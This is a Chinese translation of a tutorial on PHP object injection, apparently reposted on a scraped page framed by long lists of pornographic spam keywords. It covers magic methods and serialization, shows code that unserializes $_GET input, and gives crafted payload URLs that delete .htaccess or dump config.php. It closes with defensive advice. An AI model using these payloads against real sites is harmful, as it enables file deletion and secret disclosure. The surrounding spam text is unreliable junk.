日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

深入理解PHP對象注入

瀏覽:181日期:2022-09-11 17:22:32
0x00 背景

php對象注入是一個非常常見的漏洞,這個類型的漏洞雖然有些難以利用,但仍舊非常危險,為了理解這個漏洞,請讀者具備基礎的php知識。

0x01 漏洞案例

如果你覺得這是個渣渣洞,那么請看一眼這個列表,一些被審計狗挖到過該漏洞的系統,你可以發現都是一些耳熟能詳的玩意(就國外來說)

WordPress 3.6.1

Magento 1.9.0.1

Joomla 3.0.3

Ip board 3.3.5

除此之外等等一堆系統,八成可能大概在這些還有其他的php程序中還有很多這種類型的漏洞,所以不妨考慮坐下喝杯咖啡并且試著去理解這篇文章。

深入理解PHP對象注入

0x01 PHP類和對象

類和變量是非常容易理解的php概念,打個比方,下面的代碼在一個類中定義了一個變量和一個方法。

<?php class TestClass{ // A variable public $variable = 'This is a string'; // A simple method public function PrintVariable() {echo $this->variable; }} // Create an object $object = new TestClass(); // Call a method $object->PrintVariable(); ?>

它創建了一個對象并且調用了 PrintVariable 函數,該函數會輸出變量 variable。

如果想了解更多關于php面向對象編程的知識 請點: http://php.net/manual/zh/language.oop5.php

0x02 php magic方法

php類可能會包含一些特殊的函數叫magic函數,magic函數命名是以符號“__”開頭的,比如 __construct, __destruct, __toString, __sleep, __wakeup 和其他的一些玩意。

這些函數在某些情況下會自動調用,比如:

__construct 當一個對象創建時調用 (constructor) __destruct 當一個對象被銷毀時調用 (destructor) __ toString當一個對象被當作一個字符串使用

為了更好的理解magic方法是如何工作的,讓我們添加一個magic方法在我們的類中。

<?php class TestClass { // 一個變量public $variable = 'This is a string';// 一個簡單的方法public function PrintVariable() { echo $this->variable . '<br />'; }// Constructorpublic function __construct() { echo '__construct <br />'; }// Destructorpublic function __destruct() { echo '__destruct <br />'; }// Callpublic function __toString() { return '__toString<br />'; } }// 創建一個對象 // __construct會被調用$object = new TestClass();// 創建一個方法 // 'This is a string’ 這玩意會被輸出$object->PrintVariable();// 對象被當作一個字符串 // __toString 會被調用echo $object;// End of PHP script // php腳本要結束了, __destruct會被調用?>

我們往里頭放了三個 magic方法,__construct, __destruct和 __toString,你可以看出來,__construct在對象創建時調用, __destruct在php腳本結束時調用,__toString在對象被當作一個字符串使用時調用。

這個腳本會輸出這狗樣:

__construct This is a string __toString __destruct

這只是一個簡單的例子,如果你想了解更多有關magic函數的例子,請點擊鏈接

0x03 php對象序列化

php允許保存一個對象方便以后重用,這個過程被稱為序列化,打個比方,你可以保存一個包含著用戶信息的對象方便等等重用。

為了序列化一個對象,你需要調用 “serialize”函數,函數會返回一個字符串,當你需要用到這個對象的時候可以使用“unserialize”去重建對象。

讓我們在序列化丟進那個例子,看看序列化張什么樣。

<?php// 某類class User{// 類數據public $age = 0;public $name = '';// 輸出數據public function PrintData(){echo 'User ' . $this->name . ' is ' . $this->age. ' years old. <br />';}}// 創建一個對象$usr = new User();// 設置數據$usr->age = 20;$usr->name = 'John';// 輸出數據$usr->PrintData();// 輸出序列化之后的數據echo serialize($usr);?>

它會輸出

User John is 20 years old. O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

你可以看到序列化之后的數據中 有 20和John,其中沒有任何跟類有關的東西,只有其中的數據被數據化。

為了使用這個對象,我們用unserialize重建對象。

<?php// 某類class User{// Class datapublic $age = 0;public $name = '';// Print datapublic function PrintData(){echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';}}// 重建對象$usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}');// 調用PrintData 輸出數據$usr->PrintData();?>

著會輸出

User John is 20 years old0x04 序列化magic函數

magic函數constructor (__construct)和 destructor (__destruct) 是會在對象創建或者銷毀時自動調用,其他的一些magic函數會在serialize 或者 unserialize的時候被調用。

__sleep magic方法在一個對象被序列化的時候調用。 __wakeup magic方法在一個對象被反序列化的時候調用。

注意 __sleep 必須返回一個數組與序列化的變量名。

<?phpclass Test{public $variable = 'BUZZ';public $variable2 = 'OTHER';public function PrintVariable(){echo $this->variable . '<br />';}public function __construct(){echo '__construct<br />';}public function __destruct(){echo '__destruct<br />';}public function __wakeup(){echo '__wakeup<br />';}public function __sleep(){echo '__sleep<br />';return array('variable', 'variable2');}}// 創建一個對象,會調用 __construct$obj = new Test();// 序列化一個對象,會調用 __sleep$serialized = serialize($obj);//輸出序列化后的字符串print 'Serialized: ' . $serialized . <br />';// 重建對象,會調用 __wakeup$obj2 = unserialize($serialized);//調用 PintVariable, 會輸出數據 (BUZZ)$obj2->PrintVariable();// php腳本結束,會調用 __destruct?>

這玩意會輸出:

__construct __sleep Serialized: O:4:"Test":2:{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";} __wakeup BUZZ __destruct __destruct

你可以看到,我們創建了一個對象,序列化了它(然后__sleep被調用),之后用序列化對象重建后的對象創建了另一個對象,接著php腳本結束的時候兩個對象的__destruct都會被調用。

更多相關的內容

0x05 php對象注入

現在我們理解了序列化是如何工作的,我們該如何利用它?事實上,利用這玩意的可能性有很多種,關鍵取決于應用程序的流程與,可用的類,與magic函數。

記住序列化對象的值是可控的。

你可能會找到一套web程序的源代碼,其中某個類的__wakeup 或者 __destruct and其他亂七八糟的函數會影響到web程序。

打個比方,我們可能會找到一個類用于臨時將日志儲存進某個文件,當__destruct被調用時,日志文件會被刪除。然后代碼張這狗樣。

public function LogData($text) { echo 'Log some data: ' . $text . '<br />'; file_put_contents($this->filename, $text, FILE_APPEND); } // Destructor 刪除日志文件 public function __destruct() { echo '__destruct deletes "' . $this->filename . '" file. <br />'; unlink(dirname(__FILE__) . '/' . $this->filename); } } ?>

某例子關于如何使用這個類

<?phpinclude 'logfile.php';// 創建一個對象$obj = new LogFile();// 設置文件名和要儲存的日志數據$obj->filename = 'somefile.log';$obj->LogData('Test');// php腳本結束啦,__destruct被調用,somefile.log文件被刪除。?>

在其他的腳本,我們可能又恰好找到一個調用“unserialize”函數的,并且恰好變量是用戶可控的,又恰好是$_GET之類的什么玩意的。

<?phpinclude 'logfile.php';// ... 一些狗日的代碼和 LogFile 類 ...// 簡單的類定義class User{// 類數據public $age = 0;public $name = '';// 輸出數據public function PrintData(){echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';}}// 重建 用戶輸入的 數據$usr = unserialize($_GET['usr_serialized']);?>

你看,這個代碼調用了 “LogClass” 類,并且有一個 “unserialize” 值是我們可以注入的。

所以構造類似這樣的東西:script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}究竟發生了什么呢,因為輸入是可控的,所以我們可以構造任意的序列化對象,比如:

<?php$obj = new LogFile();$obj->filename = '.htaccess';echo serialize($obj) . '<br />';?>

這個會輸出

O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";} __destruct deletes ".htaccess" file.

現在我們將構造過后的序列化對象發送給剛才的腳本:

script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess”;}

這會輸出

__destruct deletes ".htaccess" file.

現在 .htaccess 已經被干掉了,因為腳本結束時 __destruct會被調用。不過我們已經可以控制“LogFile”類的變量啦。

這就是漏洞名稱的由來:變量可控并且進行了unserialize操作的地方注入序列化對象,實現代碼執行或者其他坑爹的行為。

雖然這不是一個很好的例子,不過我相信你可以理解這個概念,unserialize自動調用 __wakeup 和 __destruct,接著攻擊者可以控制類變量,并且攻擊web程序。

0x06 常見的注入點

先不談 __wakeup 和 __destruct,還有一些很常見的注入點允許你利用這個類型的漏洞,一切都是取決于程序邏輯。

打個比方,某用戶類定義了一個__toString為了讓應用程序能夠將類作為一個字符串輸出(echo $obj) ,而且其他類也可能定義了一個類允許__toString讀取某個文件。

<?php// … 一些include ...class FileClass{// 文件名public $filename = 'error.log';//當對象被作為一個字符串會讀取這個文件public function __toString(){return file_get_contents($this->filename);}}// Main User classclass User{// Class datapublic $age = 0;public $name = '';// 允許對象作為一個字符串輸出上面的datapublic function __toString(){return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';}}// 用戶可控$obj = unserialize($_GET['usr_serialized']);// 輸出 __toStringecho $obj;?>

so,我們構造url

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

再想想,如果我們用序列化調用 FileClass呢

我們創建利用代碼

<?php$fileobj = new FileClass();$fileobj->filename = 'config.php';echo serialize($fileobj);?>

接著用生成的exp注入url

script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php”;}

接著網頁會輸出 config.php的源代碼

<?php$private_data = 'MAGIC';?>

ps:我希望這讓你能夠理解。

0x07 其他的利用方法

可能其他的一些magic函數海存在利用點:比如__call 會在對象調用不存在的函數時調用,__get 和 __set會在對象嘗試訪問一些不存在的類,變量等等時調用。

不過需要注意的是,利用場景不限于magic函數,也有一些方式可以在一半的函數中利用這個漏洞,打個比方,一個模塊可能定義了一個叫get的函數進行一些敏感的操作,比如訪問數據庫,這就可能造成sql注入,取決于函數本身的操作。

唯一的一個技術難點在于,注入的類必須在注入點所在的地方,不過一些模塊或者腳本會使用“autoload”的功能,具體可以在這里了解

0x08 如何利用或者避免這個漏洞

別在任何用戶可控的地方使用“unserialize”,可以考慮“json_decode“

0x09 結論

雖然很難找到而且很難利用,但是這真的真的很嚴重,可以導致各種各樣的漏洞。

大家有什么想法,歡迎評論哦

原文:https://securitycafe.ro/2015/01/05/understanding-php-object-injection/

標簽: PHP
相關文章:
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
美女精品一区二区| 高清一区二区三区| 久久在线电影| 久久天堂av| 桃色av一区二区| 黄色在线网站噜噜噜| 日韩综合一区| 亚洲精品成人图区| 日韩理论片av| 99久久九九| 色婷婷久久久| 久久国产中文字幕| 狠狠色综合网| 手机精品视频在线观看| 中文无码日韩欧| 日本天堂一区| 国产极品模特精品一二| 高清在线一区| 久久一级电影| 国产视频一区免费看| 免费久久99精品国产| 日韩中文字幕视频网| 亚洲精品伊人| 国产精品蜜月aⅴ在线| 久久91视频| 成人精品国产亚洲| 久久精品国产亚洲夜色av网站| 日韩视频久久| 日韩综合一区二区| 麻豆成人在线观看| 日本免费一区二区三区四区| 欧美日韩三区| 亚洲欧洲美洲国产香蕉| 久久超碰99| 午夜欧美巨大性欧美巨大| 欧美在线亚洲综合一区| 亚洲精品自拍| 精品一区二区男人吃奶| 欧美亚洲国产一区| 亚洲精品四区| 久久精品一区| 亚洲高清不卡| 日本欧美在线| 色综合五月天| 一本色道久久精品| 欧美久久香蕉| 成人在线网站| 综合激情五月婷婷| 国产精品久久国产愉拍| 日韩精品一卡| 婷婷视频一区二区三区| 国产成人精品999在线观看| 蜜桃视频欧美| 国产亚洲观看| 久久精品国产www456c0m| 亚洲aⅴ网站| 国产成人a视频高清在线观看| 欧美精品自拍| 国产黄色精品| 国产精品日本| 精品欧美日韩精品| 另类国产ts人妖高潮视频| 国产精品白丝久久av网站| 国产一区欧美| 国产精品久久| 国产视频久久| 国产91在线精品| 午夜精品影视国产一区在线麻豆| 精品一区二区三区的国产在线观看 | 久久亚洲欧美| 久久99蜜桃| 喷白浆一区二区| 四季av一区二区凹凸精品| 蜜桃视频一区二区| 精品捆绑调教一区二区三区| 欧美天堂在线| 美女精品一区| 天堂√中文最新版在线| 欧美日韩在线精品一区二区三区激情综合| 日韩国产在线| 国产精品天堂蜜av在线播放| 鲁大师影院一区二区三区| 亚洲天堂一区二区| 欧美日韩a区| 午夜亚洲福利在线老司机| 日韩美女一区二区三区在线观看| 日韩av一级片| 在线精品一区| 亚洲国产专区校园欧美| 91成人精品观看| 国产精品毛片在线| 久久亚洲成人| 国产在线看片免费视频在线观看| 欧美精品国产白浆久久久久| 亚洲自拍另类| 一区二区三区四区在线看| 黑人精品一区| 精品国产一区二区三区av片| 亚洲三级视频| 好看的av在线不卡观看| 日韩精品一卡| 蜜臀国产一区| 久久一区视频| 国产欧美在线| 欧美日本一区| 欧美在线黄色| 日韩高清不卡一区| 免费看精品久久片| 国产精品女主播一区二区三区| 久久久久久美女精品| 麻豆视频在线观看免费网站黄| 免费看久久久| 国产精品白丝久久av网站| 日韩精品第二页| 日韩一区二区三区高清在线观看| 国产精品人人爽人人做我的可爱| 亚洲精品a级片| 91久久视频| 亚洲在线观看| 免费成人在线视频观看| 蜜臀av一区二区在线免费观看 | 99国产精品免费视频观看| av资源新版天堂在线| 国产精品13p| 精品三级国产| 国产精品13p| 九色porny丨国产首页在线| 香蕉成人av| 久久精品动漫| 免费精品国产的网站免费观看| 99久久亚洲精品蜜臀| 亚洲福利一区| 国产精品普通话对白| 视频一区二区中文字幕| 伊人久久大香伊蕉在人线观看热v| 香蕉久久国产| 亚洲免费中文| 日韩精品一区二区三区中文 | 视频一区二区国产| 在线观看亚洲精品福利片| 婷婷久久免费视频| 国产伦精品一区二区三区在线播放 | 美美哒免费高清在线观看视频一区二区| 日韩亚洲精品在线| 日韩精品一二三区| 日韩二区三区四区| 久久激情五月激情| 久久精品二区亚洲w码| 国产精品毛片一区二区在线看| 色偷偷色偷偷色偷偷在线视频| 欧美va天堂| 亚洲精品免费观看| 国产精品极品| 欧美一级精品| 日韩一区二区三区四区五区| 国产精品xxxav免费视频| 日韩精品不卡一区二区| 国产农村妇女精品一二区| 日韩国产欧美三级| 成人免费一区| 亚洲天堂久久| 国产一区二区精品| 欧美性www| 久久视频一区| 日韩专区欧美专区| 国产精品宾馆| 精品一区在线| 日韩国产在线观看| 日韩免费av| 少妇精品在线| 国产白浆在线免费观看| 羞羞答答国产精品www一本| 国产日产一区| 欧美日韩一区二区三区视频播放| 亚洲精品美女| 国产在线观看91一区二区三区 | 精品91久久久久| 久久最新视频| 美女国产一区| 欧美久久亚洲| 国产欧美日韩视频在线 | 日韩福利在线观看| 日本亚州欧洲精品不卡| 麻豆一区二区在线| 亚洲精品观看| 99视频精品免费观看| 欧美激情aⅴ一区二区三区| 久久久久久久久丰满| 麻豆久久久久久久| 日韩av一区二| 亚洲精品高潮| 尤物tv在线精品| 黑人精品一区| 精品视频一二| 国产毛片久久久| 综合激情网站| 午夜在线精品偷拍| 免费成人av在线播放| 国产亚洲在线| 蜜臀久久99精品久久久久宅男 |